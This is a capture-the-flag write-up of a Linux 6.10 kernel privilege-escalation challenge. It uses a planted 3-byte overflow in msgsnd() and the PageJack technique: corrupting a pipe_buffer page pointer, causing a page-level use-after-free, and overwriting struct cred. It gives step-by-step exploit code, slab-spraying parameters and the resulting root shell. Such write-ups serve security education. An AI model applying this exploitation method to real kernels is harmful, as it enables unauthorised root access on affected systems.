TL;DR

A 3-byte heap OOB write in msgsnd() is leveraged into a page-level UAF and then into root via a struct cred overwrite (PageJack).

Description: i love sending messages, so i made it possible to add just a few more bytes to them

Vulnerability

A custom Linux 6.10.9 kernel ships with the following patch in ipc/msgutil.c:

@@ -93,7 +93,7 @@
        return ERR_PTR(-ENOMEM);

    alen = min(len, DATALEN_MSG);
-   if (copy_from_user(msg + 1, src, alen))
+   if (copy_from_user(msg + 1, src, alen + 3))
        goto out_err;

load_msg(), invoked by msgsnd(), copies alen + 3 bytes from userland into a freshly-allocated msg_msg slab object. Three bytes are written past the end of the slot, into the next object in the same slab. The allocation size (via msgsz) and the three overflow bytes (bytes [msgsz, msgsz+1, msgsz+2] of the user buffer) are both attacker-controlled.

Relevant kernel configuration:

  • CONFIG_RANDSTRUCT_NONE=y (no field reordering on kernel structs)
  • HARDENED_USERCOPY, INIT_ON_ALLOC, INIT_ON_FREE, RANDOM_KMALLOC_CACHES are disabled
  • KASLR / SMAP / SMEP / KPTI are enabled but irrelevant (the exploit requires no infoleak)

Object collision in kmalloc-cg-1k

struct msg_msg has a 48-byte header followed by the payload:

struct msg_msg {
    struct list_head m_list;     // 16 B
    long m_type;                  //  8 B
    size_t m_ts;                  //  8 B
    struct msg_msgseg *next;      //  8 B
    void *security;               //  8 B
    /* payload */
};

msgsnd() allocates kmalloc(48 + msgsz, GFP_KERNEL_ACCOUNT). The _ACCOUNT flag routes the allocation into the kmalloc-cg-* accounted caches.

A pipe is backed by a ring of 16 pipe_buffer structs allocated as a single array:

struct pipe_buffer {
    struct page *page;            // offset 0
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};                                // sizeof = 40 B

The ring is 16 * 40 = 640 bytes, allocated via kcalloc(..., GFP_KERNEL_ACCOUNT). Both pipe_buffer[16] (640 → 1024) and msg_msg with msgsz = 974 (48 + 974 = 1022 → 1024) land in kmalloc-cg-1k. Choosing msgsz = 974 places the overflowing msg_msg next to a pipe_buffer[16] and the 3-byte overflow lands on the first field of that array, pipe_buffer[0].page.

PageJack primitive

The kernel maintains a struct page descriptor for every physical page, in a flat array (the vmemmap) located around 0xffffea0000000000 on x86_64:

PFN N  →  vmemmap[N]  @ 0xffffea0000000000 + N * 0x40

Since sizeof(struct page) == 0x40, every valid struct page * has one of {0x00, 0x40, 0x80, 0xC0} as its low byte. Overwriting that low byte with 0x40 yields:

original LSB net shift target
0x00 +0x40 PFN + 1
0x40 0 no-op
0x80 -0x40 PFN - 1
0xC0 -0x80 PFN - 2

In three cases out of four, pipe_buffer.page is shifted to a different struct page, which describes a different physical page. No PTE is involved; the corruption is purely in the kernel pointer that is later dereferenced for pipe I/O.

Pipe append semantics and the marker design

When write() is called on a pipe whose last buffer has PIPE_BUF_FLAG_CAN_MERGE set and len > 0, the kernel appends data at page + buf->offset + buf->len and increments len. The destination offset on the page is fully determined by the buffer’s offset and len fields.

Reading from a pipe consumes data and invokes pipe_buf_release (which calls put_page) only when the buffer becomes empty. A read that leaves len > 0 advances offset but does not release the buffer.

The exploit uses an 8-byte marker per pipe: two consecutive 4-byte writes that merge into a single pipe_buffer[0] with offset=0, len=8. The detection scan then reads 4 bytes per pipe, leaving each touched buffer at (offset=4, len=4). Two consequences:

  1. pipe_buf_release is never called during the scan, so the underlying page is not freed prematurely.
  2. After the scan, offset + len == 8 regardless of read order. The final write, which appends at that location, will land at offset 8 of the page.

Offset 8 on a cred_jar page is the offset of cred.uid.

cred_jar and the buddy allocator

struct cred is allocated from a dedicated slab cache (cred_jar). Slab caches are isolated at the slab layer, but they all pull backing pages from the same buddy allocator. A page returned to buddy by kmalloc-cg-1k can be reissued to cred_jar on its next refill.

The relevant fields of struct cred on Linux 6.10 (include/linux/cred.h):

0..8    atomic_long_t usage   <- refcount
8..12   kuid_t  uid
12..16  kgid_t  gid
16..20  kuid_t  suid
20..24  kgid_t  sgid
24..28  kuid_t  euid
28..32  kgid_t  egid
32..36  kuid_t  fsuid
36..40  kgid_t  fsgid

Zeroing bytes 8..36 sets uid through fsuid to 0 while leaving usage intact. With cred_jar slot size of 192 B, a single 4 KiB page hosts ~21 cred slots.

Draining cred_jar

To force cred_jar to refill from buddy, the freelist must be emptied. A setuid() loop is the standard mechanism: each call invokes

new = prepare_creds();      // ALLOCATES a fresh cred from cred_jar
new->uid = ...;
commit_creds(new);           // current->cred = new; OLD cred returns via RCU

Allocations are immediate; the freeing of the previous cred is RCU-deferred. In a tight loop, the freelist drains faster than RCU returns, and once empty the next prepare_creds() triggers a buddy request. On this kernel, ~128 iterations is sufficient. A larger drain is counter-productive: the longer the UAF page sits in buddy, the higher the chance another allocator consumes it first.

Exploitation

Setup: pin the process to a single CPU (stabilizes per-CPU slab partial lists) and raise RLIMIT_NOFILE (each pipe consumes two FDs).

Step 1: spray pipes

for (int i = 0; i < 384; i++) pipe(pipes[i]);

Each pipe() allocates a pipe_buffer[16] array into kmalloc-cg-1k.

Step 2: write markers

for (int i = 0; i < 384; i++) {
    write(pipes[i][1], &i, 4);
    write(pipes[i][1], &i, 4);
}

The second write merges with the first via CAN_MERGE; the buffer ends at offset=0, len=8 with the marker [i, i] written to its page.

Step 3: free 22 holes

free_special_pipes(48, 304);   // close i where i % 12 == 0

22 multiples of 12 in [48, 304], each surrounded by surviving pipes. A more aggressive step (e.g. 1-in-2) would allow two adjacent slots to both be reclaimed by msg_msgs, causing the overflow to clobber another msg_msg rather than a pipe_buffer.

Step 4: trigger the overflow

m.mtype = 1;
memset(m.mtext, 0x41, 974);
m.mtext[976] = 0x40;
for (int q = 0; q < 24; q++) msgsnd(qids[q], &m, 974, 0);

msgsz = 974kmalloc(1022) → 1024-byte slot. copy_from_user writes 977 bytes starting at slot offset 48; mtext[974] and mtext[975] fall into the slot’s tail padding (object 1022 B, slot 1024 B); only mtext[976] reaches byte 0 of the neighboring slot, the LSB of pipe_buffer[0].page.

Figure 1: slab layout and OOB byte landing zone

Step 5: locate the overlap

for (int i = 0; i < 384; i++) {
    int val;
    if (read(pipes[i][0], &val, 4) != 4) continue;
    if (val != i && val >= 0 && val < 384 && pipes[val][0] != -1) {
        a = i;   // corrupted pipe
        b = val; // page's legitimate owner
        break;
    }
}

A pipe whose first 4 bytes do not match its index has had bufs[0].page shifted to another pipe’s page; the read returns that other pipe’s marker. Each read consumes 4 of 8 bytes, so the page is not released. pipes[a] and pipes[b] both reference the shared page on exit.

Figure 2: pipe[a] and pipe[b] both reference the same struct page

Step 6: free the shared page

close(pipes[a][0]); close(pipes[a][1]);

pipe_release calls put_page on the shifted pointer. The refcount goes 1 → 0, the page returns to buddy. pipes[b] still holds a stale .page pointing at it: page-level UAF.

Figure 3: close(pipe[a]) returns the shared page to buddy

Step 7: drain cred_jar and fork

for (int i = 0; i < 128; i++) setuid(1000);
if (fork() == 0) fork_n_win(320);

After 128 setuid() calls, cred_jar requests a page from buddy on the next prepare_creds(). The 320 subsequent fork() calls each allocate a cred via copy_creds(); with ~21 slots per page, several land in the hijacked page.

Step 8: overwrite cred IDs

static char zeros[4096] = {0};
write(pipes[b][1], zeros, 0x18 + 4);   // 28 bytes

pipe_write appends to pipes[b].bufs[0] at page + offset + len. Two cases:

  • if b > a: pipes[b] was not read during the scan; buffer is at (0, 8).
  • if b < a: pipes[b] was read once during the scan; buffer is at (4, 4).

offset + len == 8 in both cases. The 28 zero bytes cover page offsets 8..36, i.e. uid + gid + suid + sgid + euid + egid + fsuid of the first cred slot on the page. usage (0..8) is preserved.

Figure 4: cred_jar reclaims the page; write through pipe[b] zeroes uid..fsuid

Step 9: trigger the shell

Each forked child polls getuid() and execs /bin/sh once it reads 0. The parent must not exit; closing pipes[b] would call put_page on a cred_jar page and oops the kernel.

[+] uid=0 gid=0 euid=0 egid=0 pid=239
lactf{not_the_real_thing}

Tuning rationale

Parameter Value Reason
msgsz 974 48 + 974 = 1022 rounds to 1024, landing in kmalloc-cg-1k. A larger payload moves to kmalloc-cg-2k and misses every pipe_buffer.
OOB byte 0x40 Maintains 0x40 alignment of struct page *. Any other value yields an unaligned pointer that faults on dereference.
Free step 12 Ensures each freed slot is bordered by surviving pipes, so every overflow hits a pipe_buffer.
Marker layout 2×4 B write, 4 B read Keeps the buffer alive after the scan and places the next write at page offset 8 regardless of (a, b) ordering.
Drain 128 Empties cred_jar’s freelist without leaving the UAF page exposed to other allocators for an extended period.
Closing pipes[b] never Releasing it would call put_page on a page now owned by cred_jar.

References